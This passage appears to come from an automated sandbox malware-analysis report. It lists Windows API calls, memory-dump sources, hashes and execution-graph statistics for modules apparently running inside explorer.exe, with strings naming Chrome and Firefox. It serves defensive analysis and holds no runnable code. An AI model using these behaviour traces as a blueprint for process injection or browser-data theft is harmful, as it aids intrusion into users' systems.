                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _callnewh.LIBCMT ref: 08B8CB7A
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _errno.LIBCMT ref: 08B8CB85
                                                                                                                                                                                                                            • Part of subcall function 08B8CB0C: _errno.LIBCMT ref: 08B8CB90
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 08B8C1F3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _callnewh_errno$ExceptionThrowmalloc
                                                                                                                                                                                                                          • String ID: rSingleObject
                                                                                                                                                                                                                          • API String ID: 431260796-42315373
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0E8B8DB0: HeapCreate.KERNEL32 ref: 0E8B8DCD
                                                                                                                                                                                                                            • Part of subcall function 0E8CBDA0: lstrcpyA.KERNEL32 ref: 0E8CBDF4
                                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL ref: 0E8CA1F1
                                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL ref: 0E8CA1FE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                                                                          • String ID: Chrome$Firefox
                                                                                                                                                                                                                          • API String ID: 3526404123-2335468407
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlenmallocmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1128592954-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32 ref: 0E8CBDF4
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: EnterCriticalSection.KERNEL32 ref: 0E8B9498
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: RtlInitializeCriticalSection.NTDLL ref: 0E8B94A5
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcpyA.KERNEL32 ref: 0E8B94DA
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcpyA.KERNEL32 ref: 0E8B94FD
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcatA.KERNEL32 ref: 0E8B950D
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrcatA.KERNEL32 ref: 0E8B951D
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: LeaveCriticalSection.KERNEL32 ref: 0E8B95A4
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: memcpy.MSVCRT ref: 0E8B95BC
                                                                                                                                                                                                                            • Part of subcall function 0E8B9450: lstrlenA.KERNEL32 ref: 0E8B95CA
                                                                                                                                                                                                                          • free.MSVCRT ref: 0E8CBE37
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 0E8CBE4E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrlenmemcpy
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 1946801326-109466966
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                          • String ID: false$true
                                                                                                                                                                                                                          • API String ID: 1114863663-2658103896
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: abort$_set_abort_behavior
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2064194629-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32 ref: 0E8C9DC3
                                                                                                                                                                                                                            • Part of subcall function 0E8C9FF0: GetCurrentProcessId.KERNEL32 ref: 0E8CA028
                                                                                                                                                                                                                            • Part of subcall function 0E8C9FF0: CreateToolhelp32Snapshot.KERNEL32 ref: 0E8CA037
                                                                                                                                                                                                                            • Part of subcall function 0E8C9FF0: Module32First.KERNEL32 ref: 0E8CA055
                                                                                                                                                                                                                            • Part of subcall function 0E8C9FF0: Module32Next.KERNEL32 ref: 0E8CA075
                                                                                                                                                                                                                            • Part of subcall function 0E8C9FF0: Module32Next.KERNEL32 ref: 0E8CA097
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32 ref: 0E8C9D53
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Module32$HandleModuleNext$CreateCurrentFirstProcessSnapshotToolhelp32
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 460631091-109466966
                                                                                                                                                                                                                          • Opcode ID: ce0de96562c09befa4c62966705fad150591295f16c347ae0432f9ea965f8dc9
                                                                                                                                                                                                                          • Instruction ID: 73cf0e6093ad750bbadfca64ad497e110cdfed6a50ea43820e9b0af9ba60c1df
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0de96562c09befa4c62966705fad150591295f16c347ae0432f9ea965f8dc9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9491D222215AC481DA22DB29E4143EAB3E0FFD9BD8F444A25DE9D9B764EF38C545C300
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ContextThread
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 1591575202-109466966
                                                                                                                                                                                                                          • Opcode ID: fecf89f2c3639f52313cb09aa175c09b4a4fefa18e6b65a42e0e7dfdb00e1157
                                                                                                                                                                                                                          • Instruction ID: 7c4f528a4aafa788ac3b6cdea2f998670b72c8dbbc0998b31ada3a6a2b4cd360
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fecf89f2c3639f52313cb09aa175c09b4a4fefa18e6b65a42e0e7dfdb00e1157
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE31D532219FC086D7348B55E8903EA73A6F788795F445925DE9DC7788DF7CC5468B00
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(?,?,?,?,?,?,0E8B89C3,?,?,?,?,?,?,?,?,?), ref: 0E8CE582
                                                                                                                                                                                                                          • __crtCapturePreviousContext.LIBCMT ref: 0E8CE599
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CaptureContextFeaturePresentPreviousProcessor__crt
                                                                                                                                                                                                                          • String ID: B8IH
                                                                                                                                                                                                                          • API String ID: 3852779657-109466966
                                                                                                                                                                                                                          • Opcode ID: 9f9750af0869caff7b7432302491e62c4f13da1cefb75bf64360c45936dad3bf
                                                                                                                                                                                                                          • Instruction ID: e7786f2532a16cd427efa8494527fc56b86750a66a3dd2f224b96a2bd32e3ab4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f9750af0869caff7b7432302491e62c4f13da1cefb75bf64360c45936dad3bf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2621F574315B80C6FF449B58F89036577A4F789344F90892ADA8EA77A1EF3CC959C700
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 08B82A90: _RunAllParam.LIBCPMT ref: 08B82AAC
                                                                                                                                                                                                                          • _RunAllParam.LIBCPMT ref: 08B7D263
                                                                                                                                                                                                                          • _RunAllParam.LIBCPMT ref: 08B7D276
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Param
                                                                                                                                                                                                                          • String ID: and ).
                                                                                                                                                                                                                          • API String ID: 1698386829-1089536224
                                                                                                                                                                                                                          • Opcode ID: 184ffe6a515dd46526c9c3b3ab7d42159a35620b1830b27d2eb492d9c63b974d
                                                                                                                                                                                                                          • Instruction ID: 6c1c2dc404393b671c8b414eb69e2b37338ffccf81806b63a67e1c59e1f3198f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 184ffe6a515dd46526c9c3b3ab7d42159a35620b1830b27d2eb492d9c63b974d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCF0AC6931270185DF69BFA6D4A132A2365EF85FD9F1855A5CE1E1B718CE29C482C380
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::locale::_Locimp::_Locimp_dtor.LIBCPMT ref: 08B8BDD9
                                                                                                                                                                                                                            • Part of subcall function 08B8BEF4: std::_Lockit::_Lockit.LIBCPMT ref: 08B8BF12
                                                                                                                                                                                                                            • Part of subcall function 08B8BEF4: free.LIBCMT ref: 08B8BF50
                                                                                                                                                                                                                            • Part of subcall function 08B8BEF4: std::_Lockit::~_Lockit.LIBCPMT ref: 08B8BF5B
                                                                                                                                                                                                                          • free.LIBCMT ref: 08B8BDE7
                                                                                                                                                                                                                            • Part of subcall function 08B8CACC: _errno.LIBCMT ref: 08B8CAEC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Lockitfreestd::_$Locimp::_Locimp_dtorLockit::_Lockit::~__errnostd::locale::_
                                                                                                                                                                                                                          • String ID: ore
                                                                                                                                                                                                                          • API String ID: 161006167-2619071404
                                                                                                                                                                                                                          • Opcode ID: 5f127ecb6d852186a7a4016091c7f99b380aeb7868c6ab7e7f9e58955c649337
                                                                                                                                                                                                                          • Instruction ID: 5da3293d5e19d2b6fc887b5f245110909cabc64c87ad3073a2c09d487b80e9b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f127ecb6d852186a7a4016091c7f99b380aeb7868c6ab7e7f9e58955c649337
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F03976611B41E5DF29EF6AF4A03683368FB4CBA9F6890608A5D46724DF38C495C300
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::exception::exception.LIBCMT ref: 08B8B6CC
                                                                                                                                                                                                                            • Part of subcall function 08B8E028: std::exception::_Copy_str.LIBCMT ref: 08B8E047
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 08B8B6ED
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                          • String ID: lp32Snapshot
                                                                                                                                                                                                                          • API String ID: 1924332735-2612382832
                                                                                                                                                                                                                          • Opcode ID: a723fdbf8b2a5431af685e8c51f8ba99275f1b1f5113f0538031b3811cd6a6f9
                                                                                                                                                                                                                          • Instruction ID: 194491874d3506334ff2c91ac79568c3e4ff3731841e737be6ab91fc709df0d5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a723fdbf8b2a5431af685e8c51f8ba99275f1b1f5113f0538031b3811cd6a6f9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49E04F76204B8AD1CB64EB60F49035AB7A0F398348F400415D2CD07B28EF7CC209CF01
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::exception::exception.LIBCMT ref: 08B8B68B
                                                                                                                                                                                                                            • Part of subcall function 08B8E028: std::exception::_Copy_str.LIBCMT ref: 08B8E047
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 08B8B6A8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                          • String ID: lstrcpyA
                                                                                                                                                                                                                          • API String ID: 1924332735-2919489367
                                                                                                                                                                                                                          • Opcode ID: 75d6338df16f3fc7e94c6d15f4162d0a48cce31c61ba757d02e5b78a9ed6e38f
                                                                                                                                                                                                                          • Instruction ID: 94f29a07c528590b2fa69bf6a3d43102e1cad4f70991f5f859aa1bc384be8b5d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75d6338df16f3fc7e94c6d15f4162d0a48cce31c61ba757d02e5b78a9ed6e38f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25D04C6A108B8A95DA65EB44E450359B365F794348F80861292DD07A28DFB8D219CB01
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • std::exception::exception.LIBCMT ref: 08B8B653
                                                                                                                                                                                                                            • Part of subcall function 08B8E028: std::exception::_Copy_str.LIBCMT ref: 08B8E047
                                                                                                                                                                                                                          • _CxxThrowException.LIBCMT ref: 08B8B670
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3298806459.0000000008B70000.00000020.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_8b70000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                                                                          • String ID: enProcess
                                                                                                                                                                                                                          • API String ID: 1924332735-3780156600
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.3305885544.000000000E8B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8B0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_e8b0000_explorer.jbxd
                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3605230531-0

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:7.5%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:38
                                                                                                                                                                                                                          Total number of Limit Nodes:7

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 016FD136
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 016FD173
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 016FD1B0
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 016FD209
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16f0000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2063062207-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 016FD136
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 016FD173
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 016FD1B0
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 016FD209
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16f0000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2063062207-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 016FB086
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16f0000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4139908857-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 016F59F1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16f0000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2289755597-0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 436 16f5935-16f5936 437 16f5944-16f5a01 CreateActCtxA 436->437 439 16f5a0a-16f5a64 437->439 440 16f5a03-16f5a09 437->440 447 16f5a66-16f5a69 439->447 448 16f5a73-16f5a77 439->448 440->439 447->448 449 16f5a79-16f5a85 448->449 450 16f5a88 448->450 449->450 452 16f5a89 450->452 452->452
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 016F59F1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 458 16fd300-16fd394 DuplicateHandle 459 16fd39d-16fd3ba 458->459 460 16fd396-16fd39c 458->460 460->459
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016FD387
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 453 16fd2f9-16fd394 DuplicateHandle 454 16fd39d-16fd3ba 453->454 455 16fd396-16fd39c 453->455 455->454
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016FD387
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 463 16fb020-16fb060 464 16fb068-16fb093 GetModuleHandleW 463->464 465 16fb062-16fb065 463->465 466 16fb09c-16fb0b0 464->466 467 16fb095-16fb09b 464->467 465->464 467->466
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 016FB086
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448101326.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_169d000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3992d48275c9f46d99317d3f87e1e962e89dd4741296c3647bf93790ef24c7ec
                                                                                                                                                                                                                          • Instruction ID: 7f9599e43ed5ce1c67d573e8e41c9104e834fe942e36a4d006a18d7f7e229ca8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3992d48275c9f46d99317d3f87e1e962e89dd4741296c3647bf93790ef24c7ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9201A2311083449BEB218AAECD84B67BF9CEF45330F18C57AED491A286C37D9841CAB5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448101326.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_169d000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: daa8f13c7175274fc41b2221f2a9d0c297f0e63448747c3a418f082082b42fab
                                                                                                                                                                                                                          • Instruction ID: 904e29bbbe6663ce2645e07725d4955b7dd3cff00fe85235b48d231ddb1f1614
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daa8f13c7175274fc41b2221f2a9d0c297f0e63448747c3a418f082082b42fab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42F0AF710083449EEB118A0ACD84B63FFACEB41234F18C56AED480A282C3799840CA70

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:40.2%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:483
                                                                                                                                                                                                                          Total number of Limit Nodes:12

                                                                                                                                                                                                                          Callgraph


                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
